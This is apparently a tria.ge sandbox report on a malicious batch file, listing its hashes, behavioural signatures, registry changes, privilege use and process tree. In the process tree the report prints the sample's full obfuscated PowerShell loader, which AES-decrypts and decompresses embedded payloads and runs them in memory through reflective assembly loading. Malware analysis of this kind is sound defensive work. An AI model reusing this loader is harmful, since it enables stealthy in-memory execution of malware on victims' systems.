Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
02/08/2024, 14:16
Static task
static1
Behavioral task
behavioral1
Sample
bat.bat
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
bat.bat
Resource
win10v2004-20240802-en
General
-
Target
bat.bat
-
Size
5.8MB
-
MD5
f3281ed9a501fd2ff062664456bd3016
-
SHA1
4e41be0fe4bf26907eaa738fffaabf10651c15b5
-
SHA256
3e27d2aee2a3f3a1f28e27100ed8b966ee82a85ec94d8d715f390d824e20abba
-
SHA512
cbd41cc54655e2fc7159d4cf50c6b0424b7caf927016735bf1e84b1b69ff58cf12abcee724af99f2c0aba7e176393477c16cf183d99c48163d9b85f8e7aaf1b4
-
SSDEEP
98304:BAqV8T0g2Vnxg8T2D0aBBbhP9HbTEU28tf:4TNBBbhPdT/f
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 4596 powershell.exe 3496 powershell.exe 2844 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 49 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe -
Modifies registry class 29 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 powershell.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell powershell.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 powershell.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133670818129138227" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff powershell.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 powershell.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ powershell.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ powershell.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App svchost.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 powershell.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell powershell.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133670818120857507" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff powershell.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1 svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2844 powershell.exe 2844 powershell.exe 4596 powershell.exe 4596 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2844 powershell.exe Token: SeDebugPrivilege 4596 powershell.exe Token: SeIncreaseQuotaPrivilege 4596 powershell.exe Token: SeSecurityPrivilege 4596 powershell.exe Token: SeTakeOwnershipPrivilege 4596 powershell.exe Token: SeLoadDriverPrivilege 4596 powershell.exe Token: SeSystemProfilePrivilege 4596 powershell.exe Token: SeSystemtimePrivilege 4596 powershell.exe Token: SeProfSingleProcessPrivilege 4596 powershell.exe Token: SeIncBasePriorityPrivilege 4596 powershell.exe Token: SeCreatePagefilePrivilege 4596 powershell.exe Token: SeBackupPrivilege 4596 powershell.exe Token: SeRestorePrivilege 4596 powershell.exe Token: SeShutdownPrivilege 4596 powershell.exe Token: SeDebugPrivilege 4596 powershell.exe Token: SeSystemEnvironmentPrivilege 4596 powershell.exe Token: SeRemoteShutdownPrivilege 4596 powershell.exe Token: SeUndockPrivilege 4596 powershell.exe Token: SeManageVolumePrivilege 4596 powershell.exe Token: 33 4596 powershell.exe Token: 34 4596 powershell.exe Token: 35 4596 powershell.exe Token: 36 4596 powershell.exe Token: SeIncreaseQuotaPrivilege 4596 powershell.exe Token: SeSecurityPrivilege 4596 powershell.exe Token: SeTakeOwnershipPrivilege 4596 powershell.exe Token: SeLoadDriverPrivilege 4596 powershell.exe Token: SeSystemProfilePrivilege 4596 powershell.exe Token: SeSystemtimePrivilege 4596 powershell.exe Token: SeProfSingleProcessPrivilege 4596 powershell.exe Token: SeIncBasePriorityPrivilege 4596 powershell.exe Token: SeCreatePagefilePrivilege 4596 powershell.exe Token: SeBackupPrivilege 4596 powershell.exe Token: SeRestorePrivilege 4596 powershell.exe Token: SeShutdownPrivilege 4596 powershell.exe Token: SeDebugPrivilege 4596 powershell.exe Token: SeSystemEnvironmentPrivilege 4596 powershell.exe Token: SeRemoteShutdownPrivilege 4596 powershell.exe Token: SeUndockPrivilege 4596 powershell.exe Token: SeManageVolumePrivilege 4596 powershell.exe Token: 33 4596 powershell.exe Token: 34 4596 powershell.exe Token: 35 4596 powershell.exe Token: 36 4596 powershell.exe Token: SeIncreaseQuotaPrivilege 4596 powershell.exe Token: SeSecurityPrivilege 4596 powershell.exe Token: SeTakeOwnershipPrivilege 4596 powershell.exe Token: SeLoadDriverPrivilege 4596 powershell.exe Token: SeSystemProfilePrivilege 4596 powershell.exe Token: SeSystemtimePrivilege 4596 powershell.exe Token: SeProfSingleProcessPrivilege 4596 powershell.exe Token: SeIncBasePriorityPrivilege 4596 powershell.exe Token: SeCreatePagefilePrivilege 4596 powershell.exe Token: SeBackupPrivilege 4596 powershell.exe Token: SeRestorePrivilege 4596 powershell.exe Token: SeShutdownPrivilege 4596 powershell.exe Token: SeDebugPrivilege 4596 powershell.exe Token: SeSystemEnvironmentPrivilege 4596 powershell.exe Token: SeRemoteShutdownPrivilege 4596 powershell.exe Token: SeUndockPrivilege 4596 powershell.exe Token: SeManageVolumePrivilege 4596 powershell.exe Token: 33 4596 powershell.exe Token: 34 4596 powershell.exe Token: 35 4596 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3496 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 792 wrote to memory of 4568 792 cmd.exe 84 PID 792 wrote to memory of 4568 792 cmd.exe 84 PID 792 wrote to memory of 2844 792 cmd.exe 85 PID 792 wrote to memory of 2844 792 cmd.exe 85 PID 2844 wrote to memory of 4596 2844 powershell.exe 86 PID 2844 wrote to memory of 4596 2844 powershell.exe 86 PID 2844 wrote to memory of 564 2844 powershell.exe 89 PID 2844 wrote to memory of 564 2844 powershell.exe 89 PID 564 wrote to memory of 4528 564 WScript.exe 90 PID 564 wrote to memory of 4528 564 WScript.exe 90 PID 4528 wrote to memory of 2012 4528 cmd.exe 92 PID 4528 wrote to memory of 2012 4528 cmd.exe 92 PID 4528 wrote to memory of 3496 4528 cmd.exe 93 PID 4528 wrote to memory of 3496 4528 cmd.exe 93 PID 3496 wrote to memory of 3536 3496 powershell.exe 56 PID 3496 wrote to memory of 984 3496 powershell.exe 12 PID 3496 wrote to memory of 1768 3496 powershell.exe 30 PID 3496 wrote to memory of 776 3496 powershell.exe 14 PID 3496 wrote to memory of 1952 3496 powershell.exe 33 PID 3496 wrote to memory of 2540 3496 powershell.exe 43 PID 3496 wrote to memory of 2144 3496 powershell.exe 38 PID 3496 wrote to memory of 2532 3496 powershell.exe 42 PID 3496 wrote to memory of 2788 3496 powershell.exe 47 PID 3496 wrote to memory of 1540 3496 powershell.exe 27 PID 3496 wrote to memory of 4884 3496 powershell.exe 67 PID 3496 wrote to memory of 2884 3496 powershell.exe 51 PID 3496 wrote to memory of 1328 3496 powershell.exe 22 PID 3496 wrote to memory of 1524 3496 powershell.exe 26 PID 3496 wrote to memory of 932 3496 powershell.exe 11 PID 3496 wrote to memory of 2900 3496 powershell.exe 52 PID 3496 wrote to memory of 1712 3496 powershell.exe 29 PID 3496 wrote to memory of 1120 3496 powershell.exe 18 PID 3496 wrote to memory of 2780 3496 powershell.exe 46 PID 3496 wrote to memory of 1112 3496 powershell.exe 17 PID 3496 wrote to memory of 3672 3496 powershell.exe 57 PID 3496 wrote to memory of 2292 3496 powershell.exe 41 PID 3496 wrote to memory of 2684 3496 powershell.exe 45 PID 3496 wrote to memory of 712 3496 powershell.exe 69 PID 3496 wrote to memory of 4848 3496 powershell.exe 72 PID 3496 wrote to memory of 1692 3496 powershell.exe 28 PID 3496 wrote to memory of 1292 3496 powershell.exe 21 PID 3496 wrote to memory of 1488 3496 powershell.exe 25 PID 3496 wrote to memory of 1056 3496 powershell.exe 16 PID 3496 wrote to memory of 2836 3496 powershell.exe 49 PID 3496 wrote to memory of 3420 3496 powershell.exe 55 PID 3496 wrote to memory of 1836 3496 powershell.exe 32 PID 3496 wrote to memory of 1436 3496 powershell.exe 24 PID 3496 wrote to memory of 1040 3496 powershell.exe 15 PID 3496 wrote to memory of 3692 3496 powershell.exe 68 PID 3496 wrote to memory of 1228 3496 powershell.exe 20 PID 3496 wrote to memory of 1220 3496 powershell.exe 19 PID 3496 wrote to memory of 1804 3496 powershell.exe 31 PID 3496 wrote to memory of 2000 3496 powershell.exe 35 PID 3496 wrote to memory of 2192 3496 powershell.exe 40 PID 3496 wrote to memory of 812 3496 powershell.exe 8 PID 3496 wrote to memory of 1992 3496 powershell.exe 34 PID 3496 wrote to memory of 4940 3496 powershell.exe 65 PID 3496 wrote to memory of 1392 3496 powershell.exe 36 PID 3496 wrote to memory of 2572 3496 powershell.exe 75 PID 3496 wrote to memory of 2176 3496 powershell.exe 39 PID 3496 wrote to memory of 1384 3496 powershell.exe 23 PID 812 wrote to memory of 3708 812 svchost.exe 94 PID 812 wrote to memory of 3708 812 svchost.exe 94 PID 812 wrote to memory of 3708 812 svchost.exe 94
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵PID:3708
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:932
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:984
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:776
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:1056
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1112
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1120
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1228
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1524
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1540
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1712
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1768
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1804
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1992
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2000
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2144
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2176
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2192
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2780
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Modifies data under HKEY_USERS
PID:2788
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2836
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2884
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2900
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3420
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
PID:3536 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\bat.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:792 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dyVGy+AK/alUx4C1KZGPyURnZpXePTKfrvzd88J4h2c='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EtptwhXr1MaRHHI/4/0emw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $JxCCm=New-Object System.IO.MemoryStream(,$param_var); $fscLF=New-Object System.IO.MemoryStream; $beNoU=New-Object System.IO.Compression.GZipStream($JxCCm, [IO.Compression.CompressionMode]::Decompress); $beNoU.CopyTo($fscLF); $beNoU.Dispose(); $JxCCm.Dispose(); $fscLF.Dispose(); $fscLF.ToArray();}function execute_function($param_var,$param2_var){ $eJqYy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $wnjdB=$eJqYy.EntryPoint; $wnjdB.Invoke($null, $param2_var);}$pMUKG = 'C:\Users\Admin\AppData\Local\Temp\bat.bat';$host.UI.RawUI.WindowTitle = $pMUKG;$hJjhE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($pMUKG).Split([Environment]::NewLine);foreach ($cavJU in $hJjhE) { if ($cavJU.StartsWith('cypLHeqrkKMWSgQqffJU')) { $ycQqn=$cavJU.Substring(20); break; }}$payloads_var=[string[]]$ycQqn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:4568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
